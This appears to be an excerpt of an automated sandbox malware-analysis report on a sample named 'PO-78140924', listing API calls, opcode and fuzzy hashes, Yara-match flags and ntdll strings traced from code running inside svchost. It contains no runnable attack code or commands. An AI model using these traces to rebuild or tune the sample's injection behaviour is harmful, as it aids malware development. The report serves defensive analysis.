                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _wcscmp$__fread_nolock
                                                • String ID: FILE
                                                • API String ID: 4029003684-3121273764
                                                • Opcode ID: 6ed5d6c424d366cafd4f2c21935cd71dedac310cf6e8c646e2290f4c629f4c1a
                                                • Instruction ID: 5fdb26da1d89b1b1086b2638252689e3d4b813060253166152d55abe02777a0c
                                                • Opcode Fuzzy Hash: 6ed5d6c424d366cafd4f2c21935cd71dedac310cf6e8c646e2290f4c629f4c1a
                                                • Instruction Fuzzy Hash: F5412671A0060ABADF219BE4CC86FEFB7BDDF89710F004469FA04BB181CA75994587A5
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00020ACE
                                                  • Part of subcall function 00017D2C: _memmove.LIBCMT ref: 00017D66
                                                • _wcscat.LIBCMT ref: 00055010
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FullNamePath_memmove_wcscat
                                                • String ID: S
                                                • API String ID: 257928180-186050230
                                                • Opcode ID: dd44eb98aebad92cf39d5b188a864af340e4833a7f255b1526bf92c928899d19
                                                • Instruction ID: 9dce67ac41bb71f2ae14a282166adbacf48a1098fabe5bef8876d5128ab08917
                                                • Opcode Fuzzy Hash: dd44eb98aebad92cf39d5b188a864af340e4833a7f255b1526bf92c928899d19
                                                • Instruction Fuzzy Hash: 9B31D2719083889FCB12EB74DC62AD97FB4EF0A34470804D6E9C8CF293E6349689D721
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __calloc_crt
                                                • String ID: @B
                                                • API String ID: 3494438863-858064360
                                                • Opcode ID: f4d33ef51e4c8e0de8474917b31d1b2b919b340856eb943cc43defe33e1d0f00
                                                • Instruction ID: b91ecc7999c97be125ceae984a3778f5b37131f1e7050619d2d9b6853bd52f2d
                                                • Opcode Fuzzy Hash: f4d33ef51e4c8e0de8474917b31d1b2b919b340856eb943cc43defe33e1d0f00
                                                • Instruction Fuzzy Hash: B0F0C871705712AAF7668F15FC117B527DCE722321F10842BFA44CE191EB39888047A5

                                                Execution Graph

                                                Execution Coverage:1.3%
                                                Dynamic/Decrypted Code Coverage:5.2%
                                                Signature Coverage:3.5%
                                                Total number of Nodes:115
                                                Total number of Limit Nodes:6

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417765
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 6ffa1618af0632d292b0748d9317d236ce0aa7d3db29daaaf6d4baf1b5a30646
                                                • Instruction ID: 86b87a8171b12d7f86aae936b33d596f28ad6487ebe7ca077448e3c78b696474
                                                • Opcode Fuzzy Hash: 6ffa1618af0632d292b0748d9317d236ce0aa7d3db29daaaf6d4baf1b5a30646
                                                • Instruction Fuzzy Hash: 2E015EB5E4020DBBDB10EAE1DC42FDEB3789B14308F4041AAE91897280F635EB488B95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 122 42c553-42c58c call 404823 call 42d773 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C587
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: eaaa498df1f202e73e11c77da93f6351c23fd3607e2548be4d2d18bd310d77a3
                                                • Instruction ID: 40d6515ffb0d8c156478100f86f11d36665de6fef1e232505ee3cc0160e41d75
                                                • Opcode Fuzzy Hash: eaaa498df1f202e73e11c77da93f6351c23fd3607e2548be4d2d18bd310d77a3
                                                • Instruction Fuzzy Hash: D5E08C7A6002147BD220FA9AEC01F9B776CDFC5764F00842AFA08A7242C675B90187F8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 142 3c735c0-3c735cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                                • Instruction ID: f1b3a564e57d8db6d791bfe30329b27628126f33dd2ff5f3408a1d0e42f20d15
                                                • Opcode Fuzzy Hash: 5bca34654696f2cbbf3747880e1d8e7bff62dc23291a9053aa2bdc52fdc656fb
                                                • Instruction Fuzzy Hash: 7D90027160560802D101B2584554786100687D0705FA6C411A042C5ACD87958B5165A2

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 140 3c72b60-3c72b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                                • Instruction ID: a7d954574f12c2a64cadd64d7e6835217944f3637fb12dd8db4a44f45c985589
                                                • Opcode Fuzzy Hash: 177a777725175a310be796602bea5ce4e703806b62e828f0dd9dbdf77bb4c699
                                                • Instruction Fuzzy Hash: B09002A1202504034106B2584454696400B87E0705B96C021E101C5D4DC6258A916125

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 3c72df0-3c72dfc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                                • Instruction ID: 4f6675d3e3273099332e0c4ed8d15174d0278e718619d66f0ff73dc14f53d2cb
                                                • Opcode Fuzzy Hash: a8962f70cba8c53e356e32ee86b3fe82e696817c8a9c7b6f7a4d94c0892e40e6
                                                • Instruction Fuzzy Hash: 4590027120150813D112B2584544787000A87D0745FD6C412A042C59CD97568B52A121

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: d31d0d66d9ce17b60adb9ec3b1c155f65242298bf4dff855c0ac8c6f61c18e6d
                                                • Instruction ID: 3f36b596e20f501da8a14e9799c007ada73f55c79e5f5657cf7deea93cdb8817
                                                • Opcode Fuzzy Hash: d31d0d66d9ce17b60adb9ec3b1c155f65242298bf4dff855c0ac8c6f61c18e6d
                                                • Instruction Fuzzy Hash: 34219D76E0424879DB01DEE6AC81CEE7B7CEF81364B4540AEF400A7501E6288E0747E6

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: 9e44b47bc22a8ec0d8d21bb68f6f9abacf2703760f42439acfcad519c5b20849
                                                • Instruction ID: bb0d4e07b299566bf9c979da5f0bb69b60fc03662ff57e568f92a060d12159b2
                                                • Opcode Fuzzy Hash: 9e44b47bc22a8ec0d8d21bb68f6f9abacf2703760f42439acfcad519c5b20849
                                                • Instruction Fuzzy Hash: ED11E571E4021C7ADB00AAE19C81DEF7B7CDF45398F448069F91467141D6784F078BA6

                                                Control-flow Graph
                                                • Basic blocks 413ec2-413fe3; calls 42e673, 42f083, 4176f3, 404793, 424e03, PostThreadMessageW
                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: a0ab73d9699f62229a457d3fb3d19d02f693c3ca4ea90a68e3a06eb3b7e9aa8f
                                                • Instruction ID: 509d82a56aa6430b59668e48231f84fa55fb7d97cd2f8da20a65b033e79e9690
                                                • Opcode Fuzzy Hash: a0ab73d9699f62229a457d3fb3d19d02f693c3ca4ea90a68e3a06eb3b7e9aa8f
                                                • Instruction Fuzzy Hash: 2D014472E412187ADF00EAA19C81DEFBB7C9F40314F41809AF904B7101D67C8F0787A6

                                                APIs
                                                • PostThreadMessageW.USER32(2348427,00000111,00000000,00000000), ref: 00413FCA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 2348427$2348427
                                                • API String ID: 1836367815-3640307173
                                                • Opcode ID: ac782adfae06924529a5e30e35ae14f19731af2c22eadf78365bebbb227e609a
                                                • Instruction ID: 6d01010f3193c728dff8750c668049778dff0f75af4dfb14d32fd6d48a189152
                                                • Opcode Fuzzy Hash: ac782adfae06924529a5e30e35ae14f19731af2c22eadf78365bebbb227e609a
                                                • Instruction Fuzzy Hash: 1B012671E4021C7ADB00AAE18C81DEFBB7CDF40398F448069FA04B7241D6784F068BA6

                                                Control-flow Graph
                                                • Basic blocks 42c8b3-42c8f1; calls 404823, 42d773, RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C8EC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: AdA
                                                • API String ID: 3298025750-2387861824
                                                • Opcode ID: a11feda800877c3ca01a2445fb8be3737408e5d4f0e21bd15dd5f67d54a2a995
                                                • Instruction ID: bd2691eef80fdae047e5233976a03821307e3121a39e0aab946d347188c2706f
                                                • Opcode Fuzzy Hash: a11feda800877c3ca01a2445fb8be3737408e5d4f0e21bd15dd5f67d54a2a995
                                                • Instruction Fuzzy Hash: 8DE092B62042147FD614EE59DC41F9B33ACEFC8754F404419FE08A7241D675BD108BB8

                                                Control-flow Graph
                                                • Basic blocks 42c863-42c8a4; calls 404823, 42d773, RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E534,?,?,00000000,?,0041E534,?,?,?), ref: 0042C89F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: b41a22985efab4936f4e254e00e7528fa4b8f6ba00195febd94db6b55783a08d
                                                • Instruction ID: 6a0403056a1718b8331bf25fb449449366c01ed9f6b1b2fcd939a4be5b47d379
                                                • Opcode Fuzzy Hash: b41a22985efab4936f4e254e00e7528fa4b8f6ba00195febd94db6b55783a08d
                                                • Instruction Fuzzy Hash: E8E092B66002147BDA14EE99DC41E9B33ADEFC9714F004419FA08A7241D674B910CBF8

                                                Control-flow Graph
                                                • Basic blocks 42c8f3-42c92f; calls 404823, 42d773, ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,D3E14140,?,?,D3E14140), ref: 0042C92A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: f812b8d679311479065400ef4eb868b648add57403b02bdd1dcec498a0c0e487
                                                • Instruction ID: 8f9d0e3605d52817696bfc98affba04082da645af57275fa49ccbf762d8680c5
                                                • Opcode Fuzzy Hash: f812b8d679311479065400ef4eb868b648add57403b02bdd1dcec498a0c0e487
                                                • Instruction Fuzzy Hash: 70E04F762006147BD210BB5ADC01FDB776CDBC5715F004419FA0867141C6B4790187E4

                                                Control-flow Graph
                                                • Basic blocks 41775e-4177c7; calls LdrLoadDll
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417765
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 364b494068b57fc02dbd31a3a152f451159d28eba8c023834cb5350046488fd8
                                                • Instruction ID: 20a38ea404323331c6040c3588f7fe9b393f66cda626d6e5925b034bec05e4c6
                                                • Opcode Fuzzy Hash: 364b494068b57fc02dbd31a3a152f451159d28eba8c023834cb5350046488fd8
                                                • Instruction Fuzzy Hash: DFD02E31E887083BD7108F50ED42F98B320DB42248F2043AEE978EF2E2CAB116020682

                                                Control-flow Graph
                                                • Basic blocks 3c72c0a-3c72c26; calls LdrInitializeThunk
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                                • Instruction ID: 84faa90233bd227a4f600780950a8624567ebc6a859d33608038aac95c8ba62c
                                                • Opcode Fuzzy Hash: a16fcdf74d2bc20d479bfc1b40779c81524d566da9a16b9921cb4237f4bbbc4d
                                                • Instruction Fuzzy Hash: 73B09BB19015C5C5EA11F7604608757790567D0745F5AC461D303C685E4739C2D1E175
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                                • Instruction ID: aeea6575664b303b0d03bbeb9d9d32d519b3d40015c05f24726aacc197937762
                                                • Opcode Fuzzy Hash: 288e1e2061f0e560c1dd85e3aa0938031b745a8c7eb562ba4d2397e9e79fb1f0
                                                • Instruction Fuzzy Hash: E0928A75608381AFD720DE25C884BABB7F8BB88754F084D2DFA95DB250D770E944CB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                                • Instruction ID: 9d7dce24789fb40ff977518bff5a74f094d714bea92837fdc4a33fbe62415a4c
                                                • Opcode Fuzzy Hash: 559c681ff0a6db9ad874a2e583ca350f765f3cf5d0e85e41477cb1bd899656f3
                                                • Instruction Fuzzy Hash: 1712C9756046829FC725DF29C440BBABBF5EF09704F0D8459E496CF682D738E9A0DB50
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                • API String ID: 0-3532704233
                                                • Opcode ID: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                                • Instruction ID: 0f740e15b3622867d23963a33acda5f9c426cec1905d1b5820c944a0b7c0678c
                                                • Opcode Fuzzy Hash: 474648e7b9e6e471f576550b34da2389b892e15d7c7e8e36fc944c59ba8f6a52
                                                • Instruction Fuzzy Hash: 1DB1BFB65083619FC711EF24C484B6BBBE8AF98744F054D2EF89ADB240D770DA44CB92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                • API String ID: 0-3063724069
                                                • Opcode ID: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                                • Instruction ID: 7aeef9516231f1dd5a75fb4b70d58783c071b4a3d51c8eb3b11ffe59b4fa0bda
                                                • Opcode Fuzzy Hash: d1419ac550a98ae106eb328be6077173285bf57649ba18f2e218414a7689ba6c
                                                • Instruction Fuzzy Hash: 8DD104B2814391AFD721DB64C844BAFF7F8AF84714F094A2DFA84DB250D770CA449B92
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
                                                • Instruction ID: 999f04eca14c49a2ca8f355fc30e75c9ec0dcfe12cbacca1a292ff7799485455
                                                • Opcode Fuzzy Hash: 8d95b49c85618eb2b177c53d5fc1d0be8710e1ed0688fddcce46fed617a1230c
                                                • Instruction Fuzzy Hash: A9D1EB365006A0DFCB22EF6AC440AADFBF1FF4A700F098059E855DF252C7B4AA41DB94
                                                Strings
                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03C2D262
                                                • @, xrefs: 03C2D2AF
                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03C2D0CF
                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03C2D146
                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 03C2D196
                                                • @, xrefs: 03C2D313
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03C2D2C3
                                                • @, xrefs: 03C2D0FD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                • API String ID: 0-1356375266
                                                • Opcode ID: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                                • Instruction ID: af4fcbf12c9de4b1e460a68bd190f137aa02439ed57a2f21bc7c4e55b5142e14
                                                • Opcode Fuzzy Hash: 9ca911d4ea253e6f3aed2be80c9bd74411197d7eb9f3fe707d973bd324702db4
                                                • Instruction Fuzzy Hash: FDA19B759083559FD320DF25C488B6BBBE8BB84729F014D2EE999DA240D774DA08CF93
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                                • Instruction ID: 5601b05e4e032a7c7b429a112b8deb5f94814d330cf8135b89f3dd2bb7448a73
                                                • Opcode Fuzzy Hash: 6ccc2362abff2f898f35647126503846a5754878abdb9a2aebe473ff1938aedf
                                                • Instruction Fuzzy Hash: 8742ED752083959FC715EF29C884A2AFBF5FF85608F08496DE486CB392D730EA41CB52
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                                • Instruction ID: 28b675d987838117330043e859db52ecf93edab2ec4362c1d63bf91e131efdcf
                                                • Opcode Fuzzy Hash: 2460bb24d65d45e29e422bc6442d141af3bc35aa1adca9010bdba2c8b564ae5e
                                                • Instruction Fuzzy Hash: 88C14A31A00315ABDF24DF69C894BBEF7A5AF46300F194069E886DF291EBB4DD44D3A1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                                • Instruction ID: 401a976d6696826e40c6c12aaabc568797d04490f6c7b7937c1e4415a19dc6ef
                                                • Opcode Fuzzy Hash: 219dccb58071c3c288220effa9c38945ba844c7743c43491f92de38d42ebd443
                                                • Instruction Fuzzy Hash: 3B916A35A00B159BDB38EF2AD884BBEB7A1FB51728F050128E911EF781D7B49911D790
                                                Strings
                                                • LdrpInitializeProcess, xrefs: 03C6C6C4
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 03CA8181, 03CA81F5
                                                • LdrpInitializeImportRedirection, xrefs: 03CA8177, 03CA81EB
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 03CA81E5
                                                • Loading import redirection DLL: '%wZ', xrefs: 03CA8170
